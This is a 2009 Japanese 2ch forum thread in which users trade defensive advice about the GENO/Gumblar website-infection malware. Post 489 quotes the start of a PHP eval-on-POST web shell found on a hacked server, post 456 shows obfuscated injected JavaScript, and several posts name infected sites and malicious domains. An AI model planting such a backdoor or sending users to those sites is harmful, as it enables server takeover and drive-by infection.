Acrobat Readerの改名がAdobe Readerだよね?
382:名無しさん@お腹いっぱい。
09/05/16 09:36:50
戒名な
383:名無しさん@お腹いっぱい。
09/05/16 09:38:19
不安なやつは、再インストール。
これが鉄板。
384:名無しさん@お腹いっぱい。
09/05/16 09:38:24
>>379
自分のPCを綺麗にする→サイトを綺麗にする の順。
出来れば自分のPCをきれいにした後FTP Password変更
汚染されたPCからサイトのファイルを操作してもいたちごっこ。
385:名無しさん@お腹いっぱい。
09/05/16 09:38:44
>>284
吹いたwwwおっめーふざけんなお
noscriptさんとavastくんに警護されてるから屁でもないぜ
386:名無しさん@お腹いっぱい。
09/05/16 09:42:01
>384
汚染されたPCからでも既にファイル改竄されてしまってるなら
全部消した方がいいんじゃないの?見た人感染するから
ファイル改竄がまだならアクセスしたらまずいんだろうけど
387:名無しさん@お腹いっぱい。
09/05/16 09:44:33
まとめサイトがおかしいという話をきいたが
388:名無しさん@お腹いっぱい。
09/05/16 09:44:50
>>380
40箇所以上もあるのか。
うちのルーターは最大で32箇所なのだがorz
389:名無しさん@お腹いっぱい。
09/05/16 09:46:04
え、3時間前と変わってない気がする>まとめサイト
どこがおかしいのか指摘plz
390:名無しさん@お腹いっぱい。
09/05/16 09:47:25
>>386
>>379は既にサイトが感染した場合を想定している。
早急に汚染を拡大させない*だけ*の目的なら、自身のWeb用htmlファイル全削除後に
サイトのファイル全消去。
だろうけれど、復旧にどれくらい時間がかかるかな。
391:名無しさん@お腹いっぱい。
09/05/16 09:48:16
おとといまで保守気味に書き込んでたのに
ここ2日で一気に進行加速しててワロタ
やっと認知されてきたのに、対応法は進化してないのがガクガク(((( ;゚Д゚))))ブルブル
392:名無しさん@お腹いっぱい。
09/05/16 09:48:35
>>387
同人サイト向けWiki
393:名無しさん@お腹いっぱい。
09/05/16 09:48:37
>>388
そんなに無理ww
394:名無しさん@お腹いっぱい。
09/05/16 09:48:48
カスペインストール失敗した者なんですけど、一度アンインストールしました。
もう一回インストールするときに気をつけたほうが良いこととかあったら助言お願いします。
395:名無しさん@お腹いっぱい。
09/05/16 09:49:01
693 geno New! 2009/05/16(土) 09:34:37 ID:lv1QsSrS0
今急いでチェックしてきた。これは怖い
サイトの日記でも注意喚起して来た方がいいね
あと同人向けまとめWikiのGENOウィルスまとめへのリンクが
違うサイトになっててビビったから報告
694 GENO sage New! 2009/05/16(土) 09:37:15 ID:oOSNfhyI0
>>255の、まとめサイトへのリンクが変なんだが…
関係ないページに飛ばされる。ちなみに飛んだ先でnoscriptがjs4個ブロックした
396:名無しさん@お腹いっぱい。
09/05/16 09:50:29
誰かに弄られたんだな
397:名無しさん@お腹いっぱい。
09/05/16 09:50:51
Avira、対応したな
過信は禁物だが
Engine Update AV8/9 8.02.00.168 / AV7 7.09.00.168 (2009-05-15)
- Updated: PDF exploit detection
HTML/Shellcode.Gen
398:名無しさん@お腹いっぱい。
09/05/16 09:52:07
>>397
有志が毎日報告してくれてるけど、その時点ではスルーも多いから
本当に油断禁物
399:前スレ77
09/05/16 09:53:01
>>388
でも、まだ増え続けてるよ
400:名無しさん@お腹いっぱい。
09/05/16 09:53:06
いや>379も>386も自分です
PCだけウィルス感染してる場合はすぐクリーンインスコ&パス変更で、
PCもサイトも感染済みの場合は、もうパス抜かれてるんだから
感染拡大防止に鯖のファイルまず全部消した方がいいんじゃないのかと思ったのです
401:名無しさん@お腹いっぱい。
09/05/16 09:53:30
>>394
前回のインストール用のkis8フォルダが残ってないかチェック
402:名無しさん@お腹いっぱい。
09/05/16 09:54:45
>>391
Vista機の購入で解決。
間違っても、安易にXPからVistaにアップしないこと。
403:名無しさん@お腹いっぱい。
09/05/16 09:56:19
Vistaでも感染してる人がいるらしいじゃない?
404:名無しさん@お腹いっぱい。
09/05/16 09:59:58
hXXp://www.zengozen.co.jp/
も感染確認
405:名無しさん@お腹いっぱい。
09/05/16 10:00:03
システムドライブ以外のドライブのデータファイルも改竄されたりするの?
406:名無しさん@お腹いっぱい。
09/05/16 10:01:53
>>401
ありがとうございます、消せました。
あと最初にカスペのサイト開いた時はまとめwikiのリンクから行ったんですが
wikiおかしくなってるんですよね。
検索かけたいんですがカスペって何て正式名称何だったでしょうか。
407:名無しさん@お腹いっぱい。
09/05/16 10:04:23
>>404
GJ 踏んできま~す
408:名無しさん@お腹いっぱい。
09/05/16 10:04:39
>>406
カスペでぐぐればカスペルスキーがでてくるだろ。
どこまで教えてちゃんなんだよ・・・
409:名無しさん@お腹いっぱい。
09/05/16 10:04:50
vista感染した奴は挙手!
uac切ってた?
410:名無しさん@お腹いっぱい。
09/05/16 10:04:57
カスペルスキー
411:名無しさん@お腹いっぱい。
09/05/16 10:06:45
>>406
Kaspersky (カスペルスキー)
ジャストシステムのとこでいいのかな?
URLリンク(www.just-kaspersky.jp)
一応カスペWiki
URLリンク(kaspe.2chv.net)
412:名無しさん@お腹いっぱい。
09/05/16 10:06:48
>>404
ヤバッ!埋め込まれている!
413:名無しさん@お腹いっぱい。
09/05/16 10:08:35
>>404
>>31
あほ?
414:名無しさん@お腹いっぱい。
09/05/16 10:09:15
なんだいw載ってたやつかw
415:名無しさん@お腹いっぱい。
09/05/16 10:10:52
放置されてるな
416:名無しさん@お腹いっぱい。
09/05/16 10:11:10
4月くらいに再起動できなくなるとか言ってたけど今どうなの?
regeditなんてそうそう使わないから気付かなそう
417:名無しさん@お腹いっぱい。
09/05/16 10:11:11
ノ
切ってないけどIeがアドビの更新頻繁に求めて来た
因みにアバストで検査したけど出てこなかった
バックアップした外付け感染してんのかな…
418:名無しさん@お腹いっぱい。
09/05/16 10:14:04
>>408
すみません、先に調べるべきでした。
>>410>>411
ありがとうございます。
419:名無しさん@お腹いっぱい。
09/05/16 10:17:00
avastに乗り換えてスキャンやってるんだが
かなり時間かかるのなこれ
420:名無しさん@お腹いっぱい。
09/05/16 10:19:17
ここで出てくるavastってフリー版のやつだよね? 有料版あるのかは知らないけど
avastって他のウイルスに対してはどうなのかな?
avastって良いんだろか? avastたんがいいのは分かるんだけど
421:名無しさん@お腹いっぱい。
09/05/16 10:19:50
avastかAVGで昔迷って
AVGだったけど今回からavastになった
422:名無しさん@お腹いっぱい。
09/05/16 10:19:51
もうブラウザにpdfを表示しないみたいなオプション付けろよ
423:名無しさん@お腹いっぱい。
09/05/16 10:19:58
>>400
PCだけの感染だけならば多分そう。
ただサイトのも変更されていた場合は、アクセスし削除する前に
自身のPCのhtmlを削除し無いと消している間等で、本人が消したつもりでも
再度なにかが転送される恐れがある。
424:名無しさん@お腹いっぱい。
09/05/16 10:22:49
流れ早いお
425:名無しさん@お腹いっぱい。
09/05/16 10:22:53
カスペってKaspersky Internet Security 2009とKaspersky Anti-Virus 2009、
Kaspersky Anti-Virus for Windows Server 6.0 Home Server Editionのどれがいいんですか?
426:名無しさん@お腹いっぱい。
09/05/16 10:23:29
>>63でも出てるけど、うちもcmd.exeで実行して
「dir C:\WINDOWS\system32\sqlsodbc.chm」で
エンター押したら「ファイルが見つかりません」って出る。
XPなんだが、ファイル一体どこにいるんだ……。
それともアウアウってこと?
427:名無しさん@お腹いっぱい。
09/05/16 10:23:58
>>421
ありがとう
ここ2年くらいカスペ試用版で特にまだ感染とか無いんだけど気になって聞いてみました
428:名無しさん@お腹いっぱい。
09/05/16 10:24:25
>>426
なんで普通にエクスプローラで見ようと思わないんだよ
429:名無しさん@お腹いっぱい。
09/05/16 10:24:25
>>422
Fxならプラグインから無効化出来なかったっけ
てかお前らそもそもPDFなんて読むよむのかよ
AReaderごとアンインストール→smartpdfで良くね
430:名無しさん@お腹いっぱい。
09/05/16 10:24:35
>423
なるほど解りました
ありがとう
431:名無しさん@お腹いっぱい。
09/05/16 10:26:36
そういうときは地道に辿っていくしかないべや
Cドライブ→WINDOWS→system32
で、自分の目でsqlsodbcってファイルを探す
432:名無しさん@お腹いっぱい。
09/05/16 10:27:16
>>428
ああありがとう!それでも見られたね!
感染を自己申告したサイトを見ててすげえてんぱってた。
50KBだったのでようやく安心できたよ、有難う!
433:名無しさん@お腹いっぱい。
09/05/16 10:27:17
>>431は>>426へのレス
434:名無しさん@お腹いっぱい。
09/05/16 10:27:49
このウイルスって万全な対策法がないんだよね。
それじゃクリーンインストールしたところで再感染しそう。。
しかも感染か未感染かを確実に判別する方法がないから、いつまでたっても疑心暗鬼。
めんどくさい。。
435:名無しさん@お腹いっぱい。
09/05/16 10:28:03
>>431
436:名無しさん@お腹いっぱい。
09/05/16 10:28:15
>>422
PDFをブラウザに表示ってAdobe Reader側にある
437:名無しさん@お腹いっぱい。
09/05/16 10:29:27
>>426です
>>431さんもありがとう。
てんぱりの余韻で変に安価だけ投稿してしまった。
それでは七誌に戻ります。
438:名無しさん@お腹いっぱい。
09/05/16 10:29:36
>>425
普通のPCならKaspersky Internet Security 2009
439:名無しさん@お腹いっぱい。
09/05/16 10:31:23
>>426
同人版のまとめwikiは何かが全角だとかでそのままコピペはダメらしい
同人版のスレ内にコピペが貼ってあるからそれコピペすれば普通にでてきた
440:名無しさん@お腹いっぱい。
09/05/16 10:32:46
今回ばかりは対策しないとだめだと思って
昨日の夜からはじめたらもう朝だぜ・・・
441:名無しさん@お腹いっぱい。
09/05/16 10:32:50
今回のやつとは関係ないけど
うちのavastが反応するんですが、なにこれ
りぶメールってところのサイト
URLリンク(www.livmail.com)
442:名無しさん@お腹いっぱい。
09/05/16 10:33:43
>>438
ありがとうございます!
443:名無しさん@お腹いっぱい。
09/05/16 10:34:32
ってかリブメールのトップで反応あり
444:名無しさん@お腹いっぱい。
09/05/16 10:34:54
>>441
ばっちり関係あります
445:名無しさん@お腹いっぱい。
09/05/16 10:35:15
h抜きでも飛べるから工夫して貼れっつーの
446:名無しさん@お腹いっぱい。
09/05/16 10:35:20
>>439
\ が全角だから
447:名無しさん@お腹いっぱい。
09/05/16 10:36:28
regeditはファイル名の先頭がregedの場合動作できないみたいだから
c:\windows\regedit.exeをデスクットップにでもコピーして名前変えて実行すると普通に起動できた
448:名無しさん@お腹いっぱい。
09/05/16 10:36:53
441はあぼーん依頼すべきだな
449:名無しさん@お腹いっぱい。
09/05/16 10:37:09
工夫して貼ってないとわざとやってると思われるよ
あちらこちらにわざとやってんのいるから
450:名無しさん@お腹いっぱい。
09/05/16 10:37:40
>>444
今回のウイルスですか?
>>445
すまそ
451:名無しさん@お腹いっぱい。
09/05/16 10:37:48
これってCドライブのファイルしか書き換えないんなら外付けHDD買ったときに付いてきたHD革命でCドライブのバックアップイメージ作っといて
もし感染したらイメージ復元で戻せばとりあえず感染前には戻せるんだよね?
フラッシュとアクロバットリーダーは最新にしたけどPCに最初から入ってたバスターではダメっぽいしもうマジで怖いよorz
452:名無しさん@お腹いっぱい。
09/05/16 10:39:16
ちなみに 441 は
ドリームメールの 【P貯め~る】ってメールから
リンクされています。
アクセスすると2ポイント
なんです。
453:名無しさん@お腹いっぱい。
09/05/16 10:39:25
>>451
つシステムの復元
454:名無しさん@お腹いっぱい。
09/05/16 10:39:35
バスターでは他のウイルスでも駄目なの多いからな
455:名無しさん@お腹いっぱい。
09/05/16 10:39:54
相変わらずaguseは反応しない。
456:名無しさん@お腹いっぱい。
09/05/16 10:39:59
>>441
ソースに
(function(){var UkRR='%';var WdBp=('v&61r&20a以下略
と入って居ますね
457:名無しさん@お腹いっぱい。
09/05/16 10:40:14
>>441
責任もって削除以来してこい
458:名無しさん@お腹いっぱい。
09/05/16 10:40:28
Adobe Reader→環境設定→インターネット→PDFをブラウザに表示
PDFをブラウザに表示のチェックも外したほうがいいんじゃない?
459:名無しさん@お腹いっぱい。
09/05/16 10:40:57
メールからは感染しないんだよな?
460:名無しさん@お腹いっぱい。
09/05/16 10:41:44
HTMLメールに仕込めばいくらでも逝けるんじゃね?
461:名無しさん@お腹いっぱい。
09/05/16 10:42:00
>>458
だいぶ前からはずすように言われてるよ
462:名無しさん@お腹いっぱい。
09/05/16 10:46:45
よし、俺がとりあえず>>441にアクセスしてみる
仮想PCだし。画面キャプできたらどっかにうpしようかな
463:名無しさん@お腹いっぱい。
09/05/16 10:47:10
>>461
読み直したら・・・
Adobe Reader→環境設定→JavaScript→Acrobat javascriptを使用
を切るしか書いてなかった気がしたから( ̄▽ ̄;)
464:名無しさん@お腹いっぱい。
09/05/16 10:49:56
テンプレに反映出来てないんだろうな
465:名無しさん@お腹いっぱい。
09/05/16 10:50:11
>>463
もしかしたら前スレかもしれないけど両方はずとくといいって
466:名無しさん@お腹いっぱい。
09/05/16 10:51:51
>>462
ソースに情報が書き込まれてるって>>456でかいたんだが?
467:名無しさん@お腹いっぱい。
09/05/16 10:52:24
ほんとだこのスレには>>436しかないね
468:名無しさん@お腹いっぱい。
09/05/16 10:53:24
>>441
うぁぁぁぁぁぁ
469:名無しさん@お腹いっぱい。
09/05/16 10:53:43
>>466
いや、ただ試しに踏んでみたいだけ。
470:名無しさん@お腹いっぱい。
09/05/16 10:54:12
>>441
踏んじまっただろ!!責任取れ!!
471:463
09/05/16 10:54:37
一応、自分もこのウィルスの危機にあいかけたので
気づいたところは書きたいと思います
472:名無しさん@お腹いっぱい。
09/05/16 10:54:50
>>462
やめておいた方がいい
URLリンク(www.virustotal.com)
473:94 101 154
09/05/16 10:55:04
>>422
Firefox側にもIE側にもついてるよ。
ところで、例のサイトでブラックリストが更新されたみたい。
あくまで、身内の為のリストらしい(多分、あまり騒ぎ立てて欲しくないっぽい)
感染を全て確認したわけではないし、全ては自己責任の範囲で らしいが。
俺は今から登録する。
KIS8で質問している人は、デフォルトのまま次々進めてOK
モデム切った状態で、PCを再起動させて、ネットにつないだら、直ぐにパターンファイルを更新。
更新されたら、ネットから切断して、完全スキャンを高設定にして、完全スキャン。
474:名無しさん@お腹いっぱい。
09/05/16 10:55:35
>>471
えらい!
475:名無しさん@お腹いっぱい。
09/05/16 11:00:47
ああ、またカスペ同じ症状出てしまいましたorz
最初に保存する先がデスクトップに設定してしまってるみたいで
ファイル名がデスクトップって日本語が入るせいなんでしょうか。
476:名無しさん@お腹いっぱい。
09/05/16 11:01:15
最近頻発してるネトゲの垢ハックでもこのウイルスが疑われてるな
477:名無しさん@お腹いっぱい。
09/05/16 11:02:35
>>475
たぶん、日本語入ってないとこに移すの忘れずに
478:463 471
09/05/16 11:04:28
あとは・・・sqlsodbc.chmの場所ですが
Vistaの場合はsqlsodbc.chmは
C:\Windows\Help\mui\0409
C:\Windows\Help\mui\0411
のどちらかにあると思います
479:名無しさん@お腹いっぱい。
09/05/16 11:04:29
もうだめだ!!!!!!!!
インターネット閉鎖してください!!!!!!!!!!
480:名無しさん@お腹いっぱい。
09/05/16 11:04:31
>>476
垢ハックの主はzlkon.lvだったから、同じタイプという事で気を付けているのでは無いでしょうか。
481:名無しさん@お腹いっぱい。
09/05/16 11:06:20
まだやってんのかよ・・・。
482:名無しさん@お腹いっぱい。
09/05/16 11:06:41
macを確認したいのですがどうやって調べればいいのでしょうか?
483:名無しさん@お腹いっぱい。
09/05/16 11:06:46
>>470
www。livmail。com
(株) りぶメール
店舗連絡先: 0120-二五五-八八八
電凸よろ
484:名無しさん@お腹いっぱい。
09/05/16 11:06:58
インターネット閉鎖できませーん
485:名無しさん@お腹いっぱい。
09/05/16 11:08:01
>>479,484
笑わすなww
486:94 101 154
09/05/16 11:08:51
>>473
の>デフォルトのまま次々進めてOK
はインストールや再起動後でてくるウィザードの話ね。
>>472
ずっと気になっていたんだが、
これってどうやってスキャンさせてるの?
とりあえず、自分が使ってるセキュリティーソフトに不安な人は、
G-DATAの体験版あたりでしのぐのも手かも(その分重いけど)。
avast と BitDefender のデュアルエンジンだったはず。
URLリンク(www.junglejapan.com)
メール登録あり。
>>475
状況が分からん。
どこまではやったのか書いてくれ。
俺がやった時は、セットアップファイルのフォルダの場所を日本語を含まない場所に変更したら、大丈夫だったぞ。
解凍した時に自動で出来るフォルダも怪しいから、ドライブ直下に半角英数フォルダ作り直して、
解凍して出てきたファイルを移動させてみて。
487:名無しさん@お腹いっぱい。
09/05/16 11:09:22
sqlsodbc.chmが見つからないと言ってる人は
ファイル検索ソフトでも使えば?
Everythingとかいろいろあるでしょ
488:名無しさん@お腹いっぱい。
09/05/16 11:10:14
これってファイルにも感染しますか?
大事なのを外付けに避難させてるんだけど、リカバリした後にファイルをパソコンに入れたらまた感染?
489:名無しさん@お腹いっぱい。
09/05/16 11:10:31
うちのサーバも書き換えられてたんで、いろいろファイル見てたんだがこんなのが見つかった
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode
から始まる、2450文字くらいあるんでここに書けないんで一部だけ。
FTPの情報によると5月8日に更新されたファイルのようだ
GENO関係ない?php使ってjavascript書かれてるんだが。unescapeとかも見える
どこかに全文貼ったほうがいい?詳しい人いる?
490:名無しさん@お腹いっぱい。
09/05/16 11:12:54
>>489
それアウトだな。
491:名無しさん@お腹いっぱい。
09/05/16 11:13:28
書こうと思ったらもう載ってた
URLリンク(www3.atword.jp)
緊急のとこね
>>441はmartuzに飛ばされるから